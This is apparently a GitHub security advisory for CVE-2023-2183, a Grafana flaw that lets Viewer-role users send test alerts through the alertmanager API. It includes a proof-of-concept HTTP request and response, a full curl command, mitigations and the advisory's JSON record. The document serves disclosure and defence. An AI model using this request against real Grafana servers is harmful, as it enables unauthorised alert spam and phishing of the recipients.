ghsa-cvm3-pp2j-chr3
Vulnerability from github
Summary
Grafana allows an attacker in the Viewer role, send alerts by API Alert - Test. The option is not available from the user panel UI for in the Viewer role.
Reason for the error: The API does not check access to this function and allows it by users with the least rights, for example, the Viewer that does not see this option in the user panel.
This enables malicious users to abuse the functionality by sending multiple alert messages (e-mail, slack, etc…), spamming users, prepare Phishing attack or blocked SMTP server / IP and automatically moved all message to spam folder, add to black list IP.
Details
The logged-in user, in the Viewer role, in the user panel, does not have access to the test option of sending an e-mail alert.
View of the panel for the user in the Viewer role:
Admin role - View panel for admin role:
Admin role - Next step – editing:
Admin role - Additional options:
PoC
HTTP Request by user in role Viewer ``` POST /api/alertmanager/grafana/config/api/v1/receivers/test HTTP/1.1 Host: xxx Cookie: grafana_session=xxx Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://xxx/alerting/notifications/receivers/grafana-default-email/edit?alertmanager=grafana accept: application/json, text/plain, / content-type: application/json …
{"receivers":[{"name":"test","grafana_managed_receiver_configs":[{"settings":{"addresses":"test@example.com", "singleEmail":true},"secureSettings":{},"type":"email","name":"test","disableResolveMessage":false}]}], "alert":{"annotations":{"runbook_url":"http://example.com ","description":"tekst","testowy":"test http://example.com", "more":"http://example.com "},"labels":{}}}
```
HTTP Response: ``` HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: application/json Expires: -1 Pragma: no-cache X-Content-Type-Options: nosniff X-Frame-Options: deny X-Xss-Protection: 1; mode=block Date: Wed, 05 Apr 2023 10:43:00 GMT Content-Length: 471
{"alert":{"annotations":{"value_string":"[ metric='foo' labels={instance=bar} value=10 ]","description":"tekst", "more":"http://example.com","runbook_url":"http://example.com","summary":"Notification test", "testowy":"testowy http://example.com"},"labels":{"alertname":"TestAlert","instance":"Grafana"}}, "receivers":[{"name":"test","grafana_managed_receiver_configs":[{"name":"test","uid":"ojUhNFL4k","status":"ok"}]}], "notified_at":"2023-04-05T12:43:00.1430203+02:00"}
```
Result:
The attacker can send as a template alert or plain/text.
Impact
As I showed above, an enabled user in the lowest role can execute an endpoint API that allows him to send an e-mail as an alert and impersonate its content. If modified accordingly, the recipient may fall victim to a Phishing attack or a targeted attack to block the SMTP server.
From a practical point of view, this means that for each "GrafanaReceiver" e.g.: Slack, E-mail, etc.. You can send any alert message from user with the least privileged.
CURL example – using a user session in the Viewer role:
curl -i -s -k -X $'POST' \
-H $'Host: localhost:3002' -H $'Content-Length: 386' -H $'sec-ch-ua: \"Not:A-Brand\";v=\"99\", \"Chromium\";v=\"112\"' -H $'accept: application/json, text/plain, */*' -H $'content-type: application/json' -H $'x-grafana-org-id: 1' -H $'sec-ch-ua-mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/527.36 (KHTML, like Gecko) Chrome/112.0.2615.50 Safari/11.36' -H $'sec-ch-ua-platform: \"macOS\"' -H $'Origin: http://localhost:3002' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Referer: http://localhost:3002/' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' -H $'Connection: close' \
-b $'grafana_session=xxx' \
--data-binary $'{\"receivers\":[{\"name\":\"test\",\"grafana_managed_receiver_configs\":[{\"settings\":{\"addresses\":\"<test@example.com>\",\"singleEmail\":true\x0d\x0a},\"secureSettings\":{},\"type\":\"email\",\"name\":\"test\",\"disableResolveMessage\":false}]}],\"alert\":{\"annotations\":{\"runbook_url\":\"http://example.com\",\"description\":\"tekst\",\"testowy\":\"testowy http://example.com\",\x0d\x0a\"more\":\"http://example.com\"\x0d\x0a},\"labels\":{}}}\x0d\x0a' \
$'http://localhost:3002/api/alertmanager/grafana/config/api/v1/receivers/test'
Mitigation
- In the SMTP server configuration settings, limit the ability to send multiple e-mails to the same e-mail address per unit of time / threshold.
- Check the API for the possibility of accessing this endpoint for other roles than admin
{ "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/grafana/grafana" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "8.5.26" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Go", "name": "github.com/grafana/grafana" }, "ranges": [ { "events": [ { "introduced": "9.0.0" }, { "fixed": "9.2.19" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Go", "name": "github.com/grafana/grafana" }, "ranges": [ { "events": [ { "introduced": "9.3.0" }, { "fixed": "9.3.15" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Go", "name": "github.com/grafana/grafana" }, "ranges": [ { "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.12" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Go", "name": "github.com/grafana/grafana" }, "ranges": [ { "events": [ { "introduced": "9.5.0" }, { "fixed": "9.5.3" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2023-2183" ], "database_specific": { "cwe_ids": [ "CWE-284" ], "github_reviewed": true, "github_reviewed_at": "2023-06-12T20:09:27Z", "nvd_published_at": null, "severity": "MODERATE" }, "details": "### Summary\nGrafana allows an attacker in the Viewer role, send alerts by API Alert - Test. The option is not available from the user panel UI for in the Viewer role. \n\n**Reason for the error**: The API does not check access to this function and allows it by users with the least rights, for example, the Viewer that does not see this option in the user panel. \n\nThis enables malicious users to abuse the functionality by sending multiple alert messages (e-mail, slack, etc\u2026), spamming users, prepare Phishing attack or blocked SMTP server / IP and automatically moved all message to spam folder, add to black list IP.\n\n\n### Details\nThe logged-in user, in the Viewer role, in the user panel, does not have access to the test option of sending an e-mail alert. \n\nView of the panel for the user in the Viewer role:\n![image](https://user-images.githubusercontent.com/1643385/232904030-e8a8338d-f5e3-4b04-80c3-32f2164a190e.png)\n\nAdmin role - View panel for admin role:\n![image](https://user-images.githubusercontent.com/1643385/232904264-c7aba0a5-0642-496b-998d-d500eb5ead7f.png)\n\nAdmin role - Next step \u2013 editing:\n![image](https://user-images.githubusercontent.com/1643385/232904388-ef2ee69e-3ee3-41a9-8687-305886c5c0b9.png)\n\nAdmin role - Additional options:\n![image](https://user-images.githubusercontent.com/1643385/232904480-dd493d34-d66d-47af-ab4f-3273ae8976bc.png)\n\n\n\n### PoC\n\n**HTTP Request by user in role Viewer**\n```\nPOST /api/alertmanager/grafana/config/api/v1/receivers/test HTTP/1.1\nHost: xxx\nCookie: grafana_session=xxx\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://xxx/alerting/notifications/receivers/grafana-default-email/edit?alertmanager=grafana\naccept: application/json, text/plain, */*\ncontent-type: application/json\n\u2026\n\n{\"receivers\":[{\"name\":\"test\",\"grafana_managed_receiver_configs\":[{\"settings\":{\"addresses\":\"\u003ctest@example.com\u003e\",\n\"singleEmail\":true},\"secureSettings\":{},\"type\":\"email\",\"name\":\"test\",\"disableResolveMessage\":false}]}],\n\"alert\":{\"annotations\":{\"runbook_url\":\"http://example.com \",\"description\":\"tekst\",\"testowy\":\"test http://example.com\",\n\"more\":\"http://example.com \"},\"labels\":{}}}\n\n```\n\n**HTTP Response:**\n```\nHTTP/1.1 200 OK\nCache-Control: no-cache\nContent-Type: application/json\nExpires: -1\nPragma: no-cache\nX-Content-Type-Options: nosniff\nX-Frame-Options: deny\nX-Xss-Protection: 1; mode=block\nDate: Wed, 05 Apr 2023 10:43:00 GMT\nContent-Length: 471\n\n{\"alert\":{\"annotations\":{\"__value_string__\":\"[ metric=\u0027foo\u0027 labels={instance=bar} value=10 ]\",\"description\":\"tekst\",\n\"more\":\"http://example.com\",\"runbook_url\":\"http://example.com\",\"summary\":\"Notification test\",\n\"testowy\":\"testowy http://example.com\"},\"labels\":{\"alertname\":\"TestAlert\",\"instance\":\"Grafana\"}},\n\"receivers\":[{\"name\":\"test\",\"grafana_managed_receiver_configs\":[{\"name\":\"test\",\"uid\":\"ojUhNFL4k\",\"status\":\"ok\"}]}],\n\"notified_at\":\"2023-04-05T12:43:00.1430203+02:00\"}\n\n```\n\n## Result:\nThe attacker can send as a template alert or plain/text.\n\n![image](https://user-images.githubusercontent.com/1643385/232917993-1294cfe0-3040-4d04-a533-a72ecbc666c0.png)\n\n\n### Impact\nAs I showed above, an enabled user in the lowest role can execute an endpoint API that allows him to send an e-mail as an alert and impersonate its content. If modified accordingly, the recipient may fall victim to a Phishing attack or a targeted attack to block the SMTP server. \n\nFrom a practical point of view, this means that for each \"GrafanaReceiver\" e.g.: Slack, E-mail, etc.. You can send any alert message from user with the least privileged. \n\nCURL example \u2013 using a user session in the Viewer role:\n\n```\ncurl -i -s -k -X $\u0027POST\u0027 \\\n -H $\u0027Host: localhost:3002\u0027 -H $\u0027Content-Length: 386\u0027 -H $\u0027sec-ch-ua: \\\"Not:A-Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"112\\\"\u0027 -H $\u0027accept: application/json, text/plain, */*\u0027 -H $\u0027content-type: application/json\u0027 -H $\u0027x-grafana-org-id: 1\u0027 -H $\u0027sec-ch-ua-mobile: ?0\u0027 -H $\u0027User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/527.36 (KHTML, like Gecko) Chrome/112.0.2615.50 Safari/11.36\u0027 -H $\u0027sec-ch-ua-platform: \\\"macOS\\\"\u0027 -H $\u0027Origin: http://localhost:3002\u0027 -H $\u0027Sec-Fetch-Site: same-origin\u0027 -H $\u0027Sec-Fetch-Mode: cors\u0027 -H $\u0027Sec-Fetch-Dest: empty\u0027 -H $\u0027Referer: http://localhost:3002/\u0027 -H $\u0027Accept-Encoding: gzip, deflate\u0027 -H $\u0027Accept-Language: en-GB,en-US;q=0.9,en;q=0.8\u0027 -H $\u0027Connection: close\u0027 \\\n -b $\u0027grafana_session=xxx\u0027 \\\n --data-binary $\u0027{\\\"receivers\\\":[{\\\"name\\\":\\\"test\\\",\\\"grafana_managed_receiver_configs\\\":[{\\\"settings\\\":{\\\"addresses\\\":\\\"\u003ctest@example.com\u003e\\\",\\\"singleEmail\\\":true\\x0d\\x0a},\\\"secureSettings\\\":{},\\\"type\\\":\\\"email\\\",\\\"name\\\":\\\"test\\\",\\\"disableResolveMessage\\\":false}]}],\\\"alert\\\":{\\\"annotations\\\":{\\\"runbook_url\\\":\\\"http://example.com\\\",\\\"description\\\":\\\"tekst\\\",\\\"testowy\\\":\\\"testowy http://example.com\\\",\\x0d\\x0a\\\"more\\\":\\\"http://example.com\\\"\\x0d\\x0a},\\\"labels\\\":{}}}\\x0d\\x0a\u0027 \\\n $\u0027http://localhost:3002/api/alertmanager/grafana/config/api/v1/receivers/test\u0027\n```\n\n### Mitigation\n\n1. In the SMTP server configuration settings, limit the ability to send multiple e-mails to the same e-mail address per unit of time / threshold. \n2. Check the API for the possibility of accessing this endpoint for other roles than admin\n", "id": "GHSA-cvm3-pp2j-chr3", "modified": "2023-06-12T20:09:27Z", "published": "2023-06-12T20:09:27Z", "references": [ { "type": "WEB", "url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2183" }, { "type": "PACKAGE", "url": "https://github.com/grafana/bugbounty" }, { "type": "WEB", "url": "https://grafana.com/security/security-advisories/cve-2023-2183" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N", "type": "CVSS_V3" } ], "summary": "Grafana has Broken Access Control in Alert manager: Viewer can send test alerts" }
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.